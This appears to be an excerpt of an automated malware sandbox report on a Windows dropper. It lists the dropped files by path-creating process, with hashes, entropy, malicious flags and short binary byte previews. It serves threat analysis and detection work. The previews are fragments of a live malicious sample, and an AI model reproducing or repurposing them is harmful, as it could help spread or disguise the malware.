                                                                                                                                                                    Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..
                                                                                                                                                                    Process:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                    Category:modified
                                                                                                                                                                    Size (bytes):947288
                                                                                                                                                                    Entropy (8bit):6.630612696399572
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:24576:uvG4FEq/TQ+Svbi3zcNjmsuENOJuM8WU2a+BYK:u9GqLQHbijkmc2umva+OK
                                                                                                                                                                    MD5:62D09F076E6E0240548C2F837536A46A
                                                                                                                                                                    SHA1:26BDBC63AF8ABAE9A8FB6EC0913A307EF6614CF2
                                                                                                                                                                    SHA-256:1300262A9D6BB6FCBEFC0D299CCE194435790E70B9C7B4A651E202E90A32FD49
                                                                                                                                                                    SHA-512:32DE0D8BB57F3D3EB01D16950B07176866C7FB2E737D9811F61F7BE6606A6A38A5FC5D4D2AE54A190636409B2A7943ABCA292D6CEFAA89DF1FC474A1312C695F
                                                                                                                                                                    Malicious:true
                                                                                                                                                                    Antivirus:
                                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                    Joe Sandbox View:
                                                                                                                                                                    • Filename: BagsThroat.exe, Detection: malicious, Browse
                                                                                                                                                                    • Filename: installer_1.05_36.4.exe, Detection: malicious, Browse
                                                                                                                                                                    • Filename: SoftWare(1).exe, Detection: malicious, Browse
                                                                                                                                                                    • Filename: !Setup.exe, Detection: malicious, Browse
                                                                                                                                                                    • Filename: ZTM2pfyhu3.exe, Detection: malicious, Browse
                                                                                                                                                                    • Filename: JA7cOAGHym.exe, Detection: malicious, Browse
                                                                                                                                                                    • Filename: appFile.exe, Detection: malicious, Browse
                                                                                                                                                                    • Filename: FloydMounts.exe, Detection: malicious, Browse
                                                                                                                                                                    • Filename: installer.bat, Detection: malicious, Browse
                                                                                                                                                                    • Filename: skript.bat, Detection: malicious, Browse
                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........;..h..h..hX;1h..hX;3hq..hX;2h..hr..h..h...i...h...i...h...i...h..Ch..h..Sh..h..h..hI..i...hI..i..hI.?h..h.Wh..hI..i..hRich..h........PE..L......b.........."...............................@..................................k....@...@.......@.........................|....P..h............N..X&...0..tv...........................C..........@............................................text............................... ..`.rdata..............................@..@.data....p.......H..................@....rsrc...h....P......................@..@.reloc..tv...0...x..................@..B................................................................................................................................................................................................................................................................................
                                                                                                                                                                    Process:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                    File Type:data
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):459790
                                                                                                                                                                    Entropy (8bit):7.999632331590964
                                                                                                                                                                    Encrypted:true
                                                                                                                                                                    SSDEEP:12288:P02pW2c56oA+/4hza+MglCQS9z/jgM/UB:w2LNMW6/gM/UB
                                                                                                                                                                    MD5:F9D71E9E58748BEEA3554073DCD205C8
                                                                                                                                                                    SHA1:0F059E563F46355BCA0866B3D7D0993DA4991C18
                                                                                                                                                                    SHA-256:45206C86B0AE3EB38240DD076201BE60B4983BBD0209CAA20516A9E6595C8BBA
                                                                                                                                                                    SHA-512:BBC015D43F281AF0D1CC75C3E41E13E09E5D24E9F23DB9FF5B6012E5D8978FD9C6C5C4A08B6262909660C606014BB375DCE1C4C909CA4B2D2CCA39722EBAF1A0
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Preview:.O.L..Q.HP.....g'V.,3?...p7;6}...9...<.B..C.f.JK.HF. .....7.C...p.o....:@....[v%.k.6.e..D.Y.(.p....t.[... ../l...$.6......U.6..Ye.Jw}h...i......l....P..s. .;..Z..O..|....4...{.U.-..s.:Hbs!E.C...Md.x.b %....N.r.-1....3.z.^v..m.a.5.j........jy.dq..D...z...).74..b..Y..x....p.c@.z{....&.D..j.{..........`...^.G........Rpgf..+3........%.i.......A....wde......I1*.3........Lq.fe...Jdr.+./.,7......v....}.Fr.P.......5*cEZ.p.@.....#B.....L...Td......c.....X...........92 N..zn.N.....g.....CMG...:.X......i...MW....T>}%C....>..@.S.+.&.R.......a....D.~......."...... ...z....[.!....r..C.D..1[.}S..zC....C..gv..3../q...S........(..9*M./[.X..t.w.Y..l.T'...$..L.>n........I:\.".i..D(..w....}7;.....2.n!X..l.........#.........D.QA...0p.e$/..7 .{/..H{3..i.U@....ye.....]..o....b.]+......i.$..$..^siT:..{....s...).p..G.C.8..J:.?...@"D.JY=.+["kSq..M..."?.`..r]......|QT~dB..c..O..$.C..*.l...z..1.......m.W......k..`......HY2...Z..]....... ....>f...
                                                                                                                                                                    Process:C:\Windows\SysWOW64\extrac32.exe
                                                                                                                                                                    File Type:data
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):104448
                                                                                                                                                                    Entropy (8bit):5.172930596796904
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:768:sc/mex/SGKAGWRqA60dTcR4qYnGfAHE9AUsFxyLtVx:/PdKaj6iTcPAsAhxW
                                                                                                                                                                    MD5:BE1780E619FC600C90159E321A7BCBB9
                                                                                                                                                                    SHA1:C710D9B6E5843AD64355C032D4835707B245170E
                                                                                                                                                                    SHA-256:DBA6C4B6BEB02F24A6B4F3C7892605A06A8D99D5F65366C021B1337F1D192852
                                                                                                                                                                    SHA-512:F0BB5EB234DD25FBB7D7107839CBC9E72CBD1E269CA5F4445E245CBAC4CD8E6DD8966BB4DB08C0B0C88AB22E4A78E46CC3323E201E31E15E0E6E9D82C416D0ED
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Preview:................................................................................................................................................................................................b........\... ... |....................................................................L...........I.....................................................................................0.1.2.3.4.5.6.7.8.9.A.B.C.D.E.F................?......Y@.....@.@......P?...........................(#...pqrstuvwxyz{$--%"!' .&,[\.....`abcdefghijkmno]......_..................................................................................................................................................1L..2L..2L..2L.$2L.42L.@2L.H2L.T2L.\2L.l2L.t2L.|2L..2L..2L..2L..2L..2L..2L..2L..2L..2L..2L..2L..2L..2L..2L..3L..3L. 3L.,3L.43L.<3L.T3L.`3L.l3L..3L...J..3L..3L..3L..3L..3L..3L..3L..4L..4L.$4L.44L.D4L.T4L.l4L..4L..4L..4L..4L..4L..4L..4L..4L..4L..5L...J..5L.45L.P5L.p5L..5L..5L..5L..5L..6L.$6L.<6L.P6L.h6L..6L..6L..6L..6L
                                                                                                                                                                    Process:C:\Windows\SysWOW64\extrac32.exe
                                                                                                                                                                    File Type:data
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):268
                                                                                                                                                                    Entropy (8bit):4.968398681802287
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:6:1qjvVg3F+X32+hZCt7HSbYwClS6CSNEcixNU:1yGSG+fCtJfjEvq
                                                                                                                                                                    MD5:41B7CDB6E286EE0E44962C8987B91D3C
                                                                                                                                                                    SHA1:E57E0B12ABC823CB91D3ACFA32AD63230405057D
                                                                                                                                                                    SHA-256:43F8E40249EC2FC185FDC323451FB72384EC9FF5910BD927C89CE8C41CACB58B
                                                                                                                                                                    SHA-512:B4423FD2C9D40D3715F93C6E130AF4B81CAA0B3BB3D23AF542D7043E6B91CAB1CCDDDBD2ECE8656736E4A3C594BAD99436432F4BD2EA2EA133FF381DCB8248CA
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Preview:cocks........................@...............................................!..L.!This program cannot be run in DOS mode....$.........;..h..h..hX;1h..hX;3hq..hX;2h..hr..h..h...i...h...i...h...i...h..Ch..h..Sh..h..h..hI..i...hI..i..hI.?h..h.Wh..hI..i..
                                                                                                                                                                    Process:C:\Windows\SysWOW64\extrac32.exe
                                                                                                                                                                    File Type:data
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):141312
                                                                                                                                                                    Entropy (8bit):6.686197497967684
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:3072:fEMnVIPPBxT/sZydTmRxlHS3NxrHSBRtNPnj0nEoXnmowS2uI:sMVIPPL/sZ7HS3zcNPj0nEo3tb2j
                                                                                                                                                                    MD5:2ED9FFBA1FEA63AD6D178AEA296ED891
                                                                                                                                                                    SHA1:E0D1BB0AF918F8DDEE3FB3D593CAF0FC52C77709
                                                                                                                                                                    SHA-256:21B6E909F647CC2B1ADB6945ACEDA0EE2CB3DF2C91641D7609FFAB2DB6A40FA1
                                                                                                                                                                    SHA-512:52524AD966A8D72BB53ECBA0AC5EE5DC0DB6BE0569CC0E7E0C2D03B5266465C5162AD1048AD1B827E3BDCF985D0932E19336C2D5179BCD7E655E87BABB421055
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Preview:.U...........tB.E..M.}.G.}..H.E.;}.|..%.......t.;.....v..Fh.............RY...}..}.........E...@..P.u.V.u..u............V.......;E...&....}..t.f.......f#......f;.u.....E...@..P.u.V.u..u..G........t............}......F|.M.+..........C.........M.f9C...........]..e.....C.......%..........E.............U.......8....E...%....=....u".M................%.....M..........E.;.U...C.]........U..........L.............M.,K......K...;.............K......f;.w..F<.....E.............f;.w..F<.....E.;..............E..]..j.....C......E.U.......E.......C.3.U.E..(t..U...5u..E...........~3..E.........U...d......E.........U...N3..E.........U..E........;................+.....U.....+K.....+K..U.E..u..E......}......E..E...y...%.....E......]..E......E.....=....u<..C..].%...........E...........E............E.......]..E....E.}...]..Y.]..........r;.}.........L..............M.,K......K...;.t..U.......U....3..}..E...............E....M.F|.}.+.;.w.Q.u.W.6n.......u..M.....E..?.E......<.....
                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\PasoCattle.exe
                                                                                                                                                                    File Type:data
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):62464
                                                                                                                                                                    Entropy (8bit):7.997732291588885
                                                                                                                                                                    Encrypted:true
                                                                                                                                                                    SSDEEP:1536:OC2t1VFGBsTxn/fkC+a+kem/B7BKtrFhBzd6g/4k:OC2j+u/CXoJ7ctrfxn/h
                                                                                                                                                                    MD5:50CB864F887F934B80CC62A6BB08D611
                                                                                                                                                                    SHA1:C23F38262D04019CF198D4499DD95945FE078EC4
                                                                                                                                                                    SHA-256:B2F79588B9EC05A7520F42382EA47F596AEB82A83AA4BF3426DB5AA64ABF877A
                                                                                                                                                                    SHA-512:9F68238A297F61C48380CE6867AFB929A231AB88CA836E00400B182F3CF5EED99E69B38A60CBFA578FFBF50D5C3326A6E8ECEFDF719FA8FBB99F1FC4C799E283
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Preview:.3.|...zit..ct.]!....).1o......>4...?c._...3...bd..t.[(FiSi._...2.%...".....!P...c.Y ..k...\O.k..i..}...r&..r.*........Y.hTy4...n."....4..=T......A.{...b*<_.4./..+g.(.g.WK..)s..........js..y.i.Y.q8.\..<.6.........S......!..hP..<.f.||.Y..d:8...i.i.T.'5..g.U..B..%..O....fg.v.8.Cp.W....(..3...J?. P$O...:u.Q....K.m.....N.b.A.e.M.7...{. C6U..(<_6y.QV....?..4...^.~.....A4.....U<..^....Y..n}.Y..h.).....Y#u...Y>.u.O.v....:..#..0......$KN.j.gK.(.x4......50.X....*m......\Od.K.}CN....n/."w(.Ru.6...6..\y}.{..w./..U...,&......`<..<....X:@$Ea.....4.....P..>........F..t<.M1C....`..F7EE.....A.m.W.......19.".?H...Q.....0.!K.).W..U.J=h}J... .n..L&5D....'F- s.e...v...@...'.Iwv.IcHPH..w..?..9.5#..C..I0.a.,.D.b.|....~........|9..........3....l_........B`G.UH..I.E......z&..t.M........E.,.&.[..Y..l.G...Ll..W>.3.i..B...S..8V.:\W.............$.c+@-..N/hd.YH.M..8L...WC..IX...?...?!k.F.b.....CLN..C.\..........J....i.....o...o..e.Y.....K..UL.]....K.v...y..e..:..X#.m.
                                                                                                                                                                    Process:C:\Windows\SysWOW64\extrac32.exe
                                                                                                                                                                    File Type:data
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):59392
                                                                                                                                                                    Entropy (8bit):6.612657669946948
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:1536:FC5HRu+OoQjz7nts/M26N7oKzYkBvRmLORuCYm9PrpmES6:AhVOoQ7t8T6pUkBJR8CThpmES6
                                                                                                                                                                    MD5:A5CA22529355B052CBCCB045EC8172A1
                                                                                                                                                                    SHA1:12F5D5871B07A1EABB9B57753432FC59680830D2
                                                                                                                                                                    SHA-256:E434C2A8351E6517F35FFA6D38542390AD0A905BC23FAC64E7D61680AE7CEB67
                                                                                                                                                                    SHA-512:AF9D158F1590FB96C1FB7DD1635FE9D1D7528FC3349068363F169907411EE488E2BF6AC03CE851189DBF24FDED3504A574FFF51B5CE6D41E06D8AB9360FC099E
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Preview:.E........E.Pj.V.u..E.........I...tV.E.....uM.U..$.........@..@.......t.........$........................t........3.@...3..3..Y3._^[....U...4.M..V.u...u..M...)M...3.@....W...t....tz...t....t..E...)M.PV.i.....t].}........t+M...tK.x..tEj,.E..E.0...j.P.X......E......E.P...t+M.j.V.0....I...t..M..E...3.@..3._^....U..U..E......y..........t...=....}.........t.....2.]...U......L.M.SVW.[s..P.L$$.s...L$..3.u..|$ .....................t&...t!.D$...)M.PV.p............]..t$..T.......t....u/f9..<*M.u.h.)M........f9..,*M.u.h.)M...W.W...3.9..t+M...z...f9...q......t+M.h.....D$...2..YP.L$...r..3..D$(0...j,P.D$4P.AW...D$$....D$L.D$(.D$,.....D$P....P3.P.D$.V.0....I..........D$0...........D$4%.....D$...y&3.f9.......W...D$0.....|$P..|..Y.D$P.L.D$4..@t......y.......t........t..........t.......D$4.t...u.....D$,.....D$4.D$(P3.P.D$.V.0....I...t3..~*......t.3.PV...|$..t.3.Pj..D$..0....I...t.3.C..3...D$..(.u.j.P.0...t$ ..0.......3..L$$.).u.j.Q.0..W..0....._^..[..]...U..Q.M...E.P.u...)M..Z.....t,.E
                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\PasoCattle.exe
                                                                                                                                                                    File Type:data
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):83982
                                                                                                                                                                    Entropy (8bit):7.99794941439563
                                                                                                                                                                    Encrypted:true
                                                                                                                                                                    SSDEEP:1536:SL5dqhmZ4lVzAf9EFl407V6Lf4wXM3wmosIAUZ8DYZyxSr1Pum:WqU2zOmFl40RwfdM3Ros/URcxgmm
                                                                                                                                                                    MD5:B0830E2CE03D5BC821D5136F5D8B4D5E
                                                                                                                                                                    SHA1:99840A43C60501C4F1F0151EE11798C7FA395591
                                                                                                                                                                    SHA-256:D5916524E70C85211005E2E7851E8250BF46ADD8C28FD501DB4BCFBE9EE1ADEE
                                                                                                                                                                    SHA-512:58F230B27771DA357658231E2E7445E7D13239CDB0D10D4CD5FA81267DF6EA4883C23139CE41F4892E64B6EE3CD67176C52375E9710823133B7CE20D0EB62934
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Preview:...U.,..l..I.E.l./@..8......%...i.\w6TJ....Vr...s.Y7"u......T......Z.f..Cv.X...th.....N..Ao.."C..K...(....1;WL...7..59...z..C-+..OD.N.7@.}.]......z;......^.w.2ee(.4.....FS....;B...0.#......f.r8...Y...ao.)../..0......;..ANl...f..m.=[].K.FQ4n...,........5?......E,..o../.}B..<.........te.._..s..}......._-...&.nOj..........[..p.[....CD..',...r.})e..!...K.?*.x.SK.fs.{.u..E3V..8.."...^L.)J....:.................[1.........|.p......Ou.n....+...P...}.&C..!..,.V.P...#..v.P..P..6.....F....I..8...Q...gP)V@..U.......S.wG..k'5>..i`*...KH...\ ..y....................ql...x.....&....o..=...V.H.=W.....LO..#...._H..t.....0..;.&Ie...?.z...@....s......2$r.Am..).A..J...U.5,.(M..._...]h..0...{....1..G....R...L.u....M.....:.q..%.!O....q.|.:....xy....w"N.c..y.t....Y.).-...T#...2=.nB.dM.M...+.p.....M....1_..M...k..Wp.e......M.J.5w].........R.P......(....Z.}b.K...|...vZ.V.p..........D9........t...k.....ge.m.rVj..;..m;D..P.rR..`'5..9.LXY........d.RJ+..)
                                                                                                                                                                    Process:C:\Windows\SysWOW64\extrac32.exe
                                                                                                                                                                    File Type:data
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):119633
                                                                                                                                                                    Entropy (8bit):6.0874087589267925
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:1536:sgarB/5el3EYrDWyu0uZo2+9BGmdATGODv7xvTphAiPChgZ2kOE6:sgarB/5elDWy4ZNoGmROL7F1G7ho2kOb
                                                                                                                                                                    MD5:7D6337C50FA5EB0681D5B094E58E3541
                                                                                                                                                                    SHA1:BD1A7A54D4F4382AACA1FFAF4A690799CA6081F7
                                                                                                                                                                    SHA-256:791C72AEB0CAF7FC14F0420F053C0698D27D68265810762470307EA489568780
                                                                                                                                                                    SHA-512:A24F3EADC814C87F2D592F64467CC0894347ADE35924507E81719104C0B9F293A76A51D92B5329CB57574B6EE65C71ED1BBE30D61BE041E1AE522ADDE617912F
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Preview:.KillTimer.7.PostQuitMessage...SetFocus....MoveWindow....DefWindowProcW....MessageBoxW...GetUserObjectSecurity.-.OpenWindowStationW..h.GetProcessWindowStation...SetProcessWindowStation.(.OpenDesktopW..N.CloseWindowStation..J.CloseDesktop....SetUserObjectSecurity...GetWindowRect.6.PostMessageW....MapVirtualKeyW..&.GetDlgCtrlID..d.GetParent...GetClassNameW.;.CharUpperBuffW....EnumChildWindows..{.SendMessageTimeoutW.m.ScreenToClient....GetWindowTextW..,.GetFocus....AttachThreadInput...GetWindowThreadProcessId..!.GetDC.e.ReleaseDC...GetWindowLongW....InvalidateRect....EnableWindow....IsWindowVisible...IsWindowEnabled...IsWindow..#.GetDesktopWindow....EnumWindows...DestroyWindow.K.GetMenu...GetClientRect...BeginPaint....EndPaint..U.CopyRect....SetWindowTextW..'.GetDlgItem..s.SendDlgItemMessageW...EndDialog...MessageBeep...DialogBoxParamW...LoadStringW.!.VkKeyScanW..=.GetKeyState.B.GetKeyboardState....SetKeyboardState....GetAsyncKeyState..v.SendInput.0.keybd_event...SystemParametersInfoW...F
                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\PasoCattle.exe
                                                                                                                                                                    File Type:data
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):59392
                                                                                                                                                                    Entropy (8bit):7.997035686695416
                                                                                                                                                                    Encrypted:true
                                                                                                                                                                    SSDEEP:1536:F5ORWtjA85b/PQW6wzxYtMbs8VKKXsgN1yFi3eb7:Op85T6tIDVKKXZMoeb7
                                                                                                                                                                    MD5:BF1A63801FCE643D91670984E50AA26C
                                                                                                                                                                    SHA1:96CC6E514ED73B0F0816884E6019F3F3C31F6A80
                                                                                                                                                                    SHA-256:96E885D5F09D9B01BBBB20C5DA4005E84683F65EE061EB2D22F41DA96A1A48A0
                                                                                                                                                                    SHA-512:D741447E64E376442A4FBEE480A94C494219292BB70DF6A346C5244C12F647BDC074F13F53A0FC32202C1D8D6A37C7BAA9CC0E750020492B99781D9CEEE3F943
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Preview:.O.L..Q.HP.....g'V.,3?...p7;6}...9...<.B..C.f.JK.HF. .....7.C...p.o....:@....[v%.k.6.e..D.Y.(.p....t.[... ../l...$.6......U.6..Ye.Jw}h...i......l....P..s. .;..Z..O..|....4...{.U.-..s.:Hbs!E.C...Md.x.b %....N.r.-1....3.z.^v..m.a.5.j........jy.dq..D...z...).74..b..Y..x....p.c@.z{....&.D..j.{..........`...^.G........Rpgf..+3........%.i.......A....wde......I1*.3........Lq.fe...Jdr.+./.,7......v....}.Fr.P.......5*cEZ.p.@.....#B.....L...Td......c.....X...........92 N..zn.N.....g.....CMG...:.X......i...MW....T>}%C....>..@.S.+.&.R.......a....D.~......."...... ...z....[.!....r..C.D..1[.}S..zC....C..gv..3../q...S........(..9*M./[.X..t.w.Y..l.T'...$..L.>n........I:\.".i..D(..w....}7;.....2.n!X..l.........#.........D.QA...0p.e$/..7 .{/..H{3..i.U@....ye.....]..o....b.]+......i.$..$..^siT:..{....s...).p..G.C.8..J:.?...@"D.JY=.+["kSq..M..."?.`..r]......|QT~dB..c..O..$.C..*.l...z..1.......m.W......k..`......HY2...Z..]....... ....>f...
                                                                                                                                                                    Process:C:\Users\user\Desktop\CLaYpUL3zw.exe
                                                                                                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):1062983
                                                                                                                                                                    Entropy (8bit):7.969270980145046
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:12288:00giFMExCeGp6bA+2lC/S9zD0upW2+IHxb7A8G5jMVTn1Xx1MwT6/OkwyR4UzU+J:/ieH66juI80CT1DMa4LwxIM9HM/U1OK
                                                                                                                                                                    MD5:A3E9A86D6EDE94C3C71D1F7EEA537766
                                                                                                                                                                    SHA1:DDFBF23CBA3ADC0BCAD33162D1BDBEE8CCD12294
                                                                                                                                                                    SHA-256:A7B3B6CA09E92530EF0BD156B0C2C0213E957129BFB83B8A99D2387932BB2CA5
                                                                                                                                                                    SHA-512:AF6391847FF626FF88FF0583ADDE9536EFF25026ACBC0D0165CE27286A8F145CBB0B5059A294D7A14CB497C60B96E9A5DE88D41A3EE6A339FDB554DE51790F0C
                                                                                                                                                                    Malicious:true
                                                                                                                                                                    Antivirus:
                                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 11%
                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......A{.k...8...8...8.b<8...8.b,8...8...8...8...8...8..%8...8.."8...8Rich...8........PE..L.....GO.................t.......B...8............@.................................t.....@.................................@..........."u..............8+...`.......................................................................................text....r.......t.................. ..`.rdata..n+.......,...x..............@..@.data....+..........................@....ndata...................................rsrc..."u.......v..................@..@.reloc............... ..............@..B................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                    Process:C:\Windows\SysWOW64\extrac32.exe
                                                                                                                                                                    File Type:data
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):133120
                                                                                                                                                                    Entropy (8bit):6.593902201612224
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:3072:2+AqVnBypIbv18mLthfhnueoMmOqDoioO5bLezW9FfTut/Dde6u640ewy4Za9cob:2mVnjphfhnvO5bLezWWt/Dd314V14Zgz
                                                                                                                                                                    MD5:998B4B6FEEE76BEB9CA721DCD2B8A4E0
                                                                                                                                                                    SHA1:6556CA455B7F7B3B36F5A703746B17D2D662F82B
                                                                                                                                                                    SHA-256:A3718216E2D86886D768FDE1FE869B9F84FA96309ADC8D83CAF1F17B939F76BF
                                                                                                                                                                    SHA-512:A8E92A0CF4CA465313BFE27D860F956F3777B3202A8B1FDFB03DB4AAAD567F3546C525F40D85414D04806D964B650637846FD1F7CCA6736B8C8E327B342C3617
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Preview:.~..v..F..H..u....N.P...j...P......u......k1...>3._.F.....^]...U..E.VW.@..H..0.2...P...*...P.\....u......+1...>3._.F.....^]...U..V.u....W.~..v..F..H.......V.P.J..2.....P.......P.....u.......0...>3._.F.....^]...U....SVW.}.3.]..]..]..w....r!.G.j).H..M.......u......M.A......r..G.j).H.......u..W....E....r..O.j).I..k.....u..9....O.....E..I..(.....$..E..G..p....G....u..F..u..u....G.SQ.......P.x....u......./...>3._.F.....^[....U..M.3.9A.v..A....q..VWP......u....../...>3._.F.....^]...U.....e..SVW.}.........j...j.S.X....E.....x..v..@....Mq.....E..M.Q.M.Q.M.Q.M.Q.M.QP.............E.3..e..Fj..E.E.VPS.u..........M..#/...E.3.V.E.E.VPS.}.u..........M.......E.j..E.E.VPS.}.u.........M.......E.j..E.E.VPS.}.u.........M......E.j..E.E.VPS.}.u..].......M......8.......'.3.B.W....H..|1...D1.t..@8.P..|1...D1.t..@8.@.._^3.[....U........=.(M..SVW.L$.uA...@..|....T..t..R83.C.Z..|....T..t..R8.u....B.......3..^..>.Q.....(M..0....M.3..C.|$..y..v..I.......;.u.....2.....!............M..
                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\PasoCattle.exe
                                                                                                                                                                    File Type:data
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):73728
                                                                                                                                                                    Entropy (8bit):7.9975626227798315
                                                                                                                                                                    Encrypted:true
                                                                                                                                                                    SSDEEP:1536:cQ36ddIs69BLJSqA8PWfAx/lruBD5hf6akJGg1lg+xM4Zl:cQlF9oAjrO4G+a+xMyl
                                                                                                                                                                    MD5:832042466014761981CDAF193F0E7041
                                                                                                                                                                    SHA1:301225CDE7E7DE3A10E98D7C9DE191D85AAC0099
                                                                                                                                                                    SHA-256:FF5E35AC52EA87EC94D3847112D9F3083B3BF252FA74C76D453EE118BA1A2BE8
                                                                                                                                                                    SHA-512:2A49ECD5DE8702A71267463B8CD130F1AA91D1E3F8D9EB866B8C58C8FC46374F98AECDCDCD071D207F734A61D082AAA56170152EEDA3C0E445C0A5CCD6A50260
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Preview:..2O;.....=F.u...~X.^tu4ey?...v............E=.....U..x...'...=.g.....=..".......C-..}...8...8.Br..g]....M.-.>.r,...I.......!.5..f.4...FV.U.,.%zY...~.ysqV..V...I...?...)..zRsa...#.G..C.pqe.b{.:%k.y...)..Y..-<.n.J/<gkN..m.\.L.I.VIC q.rc..YMn%<....O.......4.....J..C,s..U.{N.z.pAU..dX...M.7.$1...a..&..|89...}).g...F.e.p.....&..P..t.0......64.$)...K..f2.!.P.P...A...~..G..!.M.f.f..._...i..U.<..@9 .....2.FN.`....fT..#[...\9.0.kO.S.^A.....K:.....a.AES2...ps$.8F5... UF......(.X=Ha............s.rb.._f.A...q..*..#.....M..T...qj:...$0Y...P...r..o..].m.f.>.1_|.p76.........a..6.>G.a.....c...]u+.$....v. 3[-e...D.kw. ..Y.O.a.BsW....E...bw`..Y.7>...<......e.....a..*E...Vy..#u3..A.YW......~......w.-P..)S..4.J...k..JZ.\.HR..V...y....q..jB..@.G@-..Q5."[.&A.J!....F.'J4..>.......< ........@..c5/K.y.....S......?.3.Q...2M........?~....GQ0.k8.{5[.P\WY..7....k.wc.JA.k..77"^a.n...I.#....J.M..p!....t=z..?W .Iqi...b..!PDv...)3.....;,#.uH2...X....+..<.G;hM......$.Npr.e....|.
                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\PasoCattle.exe
                                                                                                                                                                    File Type:data
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):100352
                                                                                                                                                                    Entropy (8bit):7.9982884825197775
                                                                                                                                                                    Encrypted:true
                                                                                                                                                                    SSDEEP:1536:qIl7/T+lGxZhNlCtHtyAtgvWscqQlxaDOgASCZ5FSJqz7D6qAK8KxGBpM:xZL33R0HtyA+RQlKOmxw/D8KxGBpM
                                                                                                                                                                    MD5:CD00C53F92FBED3C8947B7205A4247ED
                                                                                                                                                                    SHA1:87D5486B7EFD98DCC92B4393D20D39D12CB6487E
                                                                                                                                                                    SHA-256:EDD50131DA69EA2747D0BCA3ECD4293778BEB5491FBF02BF6D4ADA4B2E9F01C1
                                                                                                                                                                    SHA-512:D1C7AAD1E7F376C7622031D36A3C1F2452B693E5FA976B35CFC22045180388B55218FA8C2B0270C2F66C996B805112C6D82F312642809D9051F350AE1220A85E
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Preview:..t!@xF.....U...-p.....)..1^....Y.....w...z..(.....b.$\X..2..#.....6c..@...\.E$R.u....Z.]..<`..v...9.a.W..N?=...6..d._......9.~.5~.....Jd...~0h'.............bf.6....Q.I........J.U.d......I...\.'J..m..).n.,S.../.............*...$.j.....,L.-....`s2..2...V........U.6.\./U~...y...K..2.i.*z...l.k.EQ..*+.=.....E]T.\Y.?.C..'*.m...hP.'.M..mc....:}.e6-^.g..$...o.k.b]!@...Vl.,.e.O.....9S.?..MA......|...U?].....D..f...*.D=....za.Nf......46.I......>..../T(6...L..B..Y.8.3B..J.[S..@........%..^..e$.ck......b.h.....Y.$:.K_p}c.;i..C.}..O.D |.&...*f|n.......yq....#|..B..T..F....t..R~)d)<.N.0......tp.9..~Co.....W.n.(1.).y...%_.......Y....D(..b....>..)^....dGX..iA.9...n.H8...pn...D...\.......a5.t\<1.N..=.......v..e.q.M.W..]....a.-7~*BO.k..j...|3.}_2jz.A3.X.-3(.fN\.4.>J......yG...om......f....v..uCP...+g...i.IU{R..Be8.....o5...=...k.n`(..m..w..S.9.@..l.ri...U?..ctD+...+S...u.e;..G.G.=3S,.S.......q....M.U/z.>..y..k....e..J&4$.z.....[B..J.Ax0..!]fr....M..Ry
                                                                                                                                                                    Process:C:\Windows\SysWOW64\extrac32.exe
                                                                                                                                                                    File Type:data
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):88064
                                                                                                                                                                    Entropy (8bit):5.844749716437728
                                                                                                                                                                    Encrypted:false
